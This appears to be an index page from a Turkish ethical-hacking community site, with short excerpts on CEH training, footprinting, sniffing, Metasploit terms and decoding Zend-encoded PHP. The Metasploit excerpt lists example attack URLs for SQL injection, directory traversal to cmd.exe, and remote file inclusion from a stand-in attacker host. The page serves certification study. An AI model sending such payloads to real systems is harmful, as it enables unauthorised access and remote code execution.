The Ethical Hacker Security Platform
CEH ve CHFI eğitimlerini vermekte olan Ec-Council Türkiye Distribütörü Academytech ‘e CEH ve CHFI eğitimleri hakkında bilgi istediğim bir mesaj göndermiştim. Sağ olsunlar Erdinç Bey CEH ve CHFI Eğitimleri ile ilgili sorularımı yanıtlamış. CEH ve CHFI eğitimleri hakkında sorduğum soruları ve aldığım cevapları özetleyerek buraya yazayım 🙂 CEH eğitimi haftada beş gün şeklinde verilmekte ve CEH eğitimine katılabilmemiz için bilgisayar teknolojileri alanında...
Certified Ethical Hacker sertifikasına sahip güvenlik uzmanları bir bilgisayar korsanı gibi kurumların veya şirketlerin güvenliklerini test ederler. Bir etik hacker herhangi bir firma veya kurumdan gelen talep üzerine, gerçek bir bilgisayar korsanı gibi ilgili kurum ve firmanın sistemlerini tarayarak güvenlik açıklarını tespit eder ve bu açıkları istismar ederek hedef sistemlere girmeye çalışır. Burada amaç saldırılara hedef olabilecek firmanın/kurumun bir saldırgan gözü...
Linux u özetleyen sunuma www.cehturkiye.com/linux.pdf adreslerinden ulaşabilirsiniz.
CEH Türkiye, her ne kadar isimen çağrıştırıyor olsada bir hacking grubu değildir. CEH Türkiye topluluğu her hangi bir grubun karşısında veya tarafında olmayan bağımsız bir bilgi güvenliği topluluğudur. Amaç olarak bilişim güvenliği ile yakından ilgili güvenlik uzmanları ve meraklılarını CEH, CHFI, LPT gibi bilişim güvenliği sertifikasyon programları konusunda yönlendirmek, bu tür sertifika sınavlarına hazırlanan bireylere yardımcı olacak bir kütüphane olmak...
Certified Ethical Hacker (CEH), bilişim suçları işleyen korsanların kullandıkları teknik ve yöntemleri bilen, korsanların eylemleri sıraında kullandıkları araçları ve yazılımları tanıyan, kısacası bilgisayar dünyasının kötü adamları ile aynı bilgi ve beceriye sahip, iyi niyetli güvenlik uzmanıdır. CEH Ya da uzun ismiyle Certified Ethical Hacker, hacking becerilerini, savunma amaçlı kullanarak görev yaptığı veya danışmanlığını yaptığı kurum / kuruluşların saldırıya uğramasını engellemeye...
İzsürmeyi Tanımlamak – iz sürme medotlu bir şekilde bir hedefin güvenlik profili hakkında bilgi toplamaktır. – İz sürme 3 ön saldırı evresinden biridir.Diğerleri tarama ve enumeration dır. – Kısacası iz sürme hedef sistem (interneti,intraneti,extraneti ve wireless) hakkında bilgi toplamaktır. Bilgi Toplama Teknolojisi FootPrinting – Bilgiyi ortaya çıkarmak – Network ip aralığını bulmak – Aktif makinaları bulmak – Açık portları ve...
CEH v6 Slaytları yayımlandı. İlk 24 modülün bulunduğu CEH v6 Slaytlarını indirmek için forumda açılmış olan CEH v6 Slaytları başlığına bakabilirsiniz. Genişletilmiş ve zenginleştirilmiş yeni versiyonda yer alan modül başlıkları işe aşağıdaki gibidir… Module 1: Introduction to Ethical Hacking Module 2: Hacking Laws Module 3: Footprinting Module 4: Google Hacking Module 5: Scanning Module 6: Enumeration Module 7: System Hacking...
Sniffing Nedir ? Sniffing temel olarak verinin yolunu kesmek olarak tabir edilebilir. Sniffing ile networkdeki paketler yakalanabilir içeriği okunabilir. Sniffingin amacı ; Şifreleri (email, web, SMB , ftp, telnet,SQL) ,Email text’ini Transfer edilen dosyaları (e-mail,ftp, SMB ) yakalamaktır. Sniffing metodu ikiye ayrılır ; Pasif Sniffing ve Aktif Sniffing. Pasif Sniffing Hub olan sistemler için geçerlidir,Hub olan networklerde paketler tüm...
Metasploit ile Güvenlik Denetimi Terimler: Exploit : Bir sistemin yada programin güvenlik açigini kullanarak yetkisiz bir islem yapilmasini saglayan yöntem. http://sunucu/script/login.asp?uid=’ OR 1=1– http://sunucu/script/..%c0%af../winnt/system32/cmd.exe?/c+dir http://sunucu/script/index.php?dizin=http://saldırgan.com/kotukod.txt? Payload : Exploit sonrasi çalisip yetkisiz islevi gerçeklestirecek içerik. Shellcode:Exploit sonrasi çalisicak olan sisteme özel kodlar. Nop : “Not Operation” , bellek yeri öğrenme amaçlı bellek dolduran bitler.. Encoder : Çalışacak olan Shellcode’u değiştiren ve...
Bugun elime bir kaç sayfa kod geçti hımm zendle şifrelenmiş napabilirim diye düşürüm. Çok kısa bir araştırmadan sonra farklı kaynaklardan bulduğum , deneyip bir araya getirdiğim dosya ve yazılımlarla neyseki kodları sağlıklı bir şekilde decode edebildim : ) Arkadaşım için ve birgün birilerinede lazım olur diye zend ve dezend olayını bu işi yapan site ve yazılımları paylaşmak istedim. Zend Nedir...
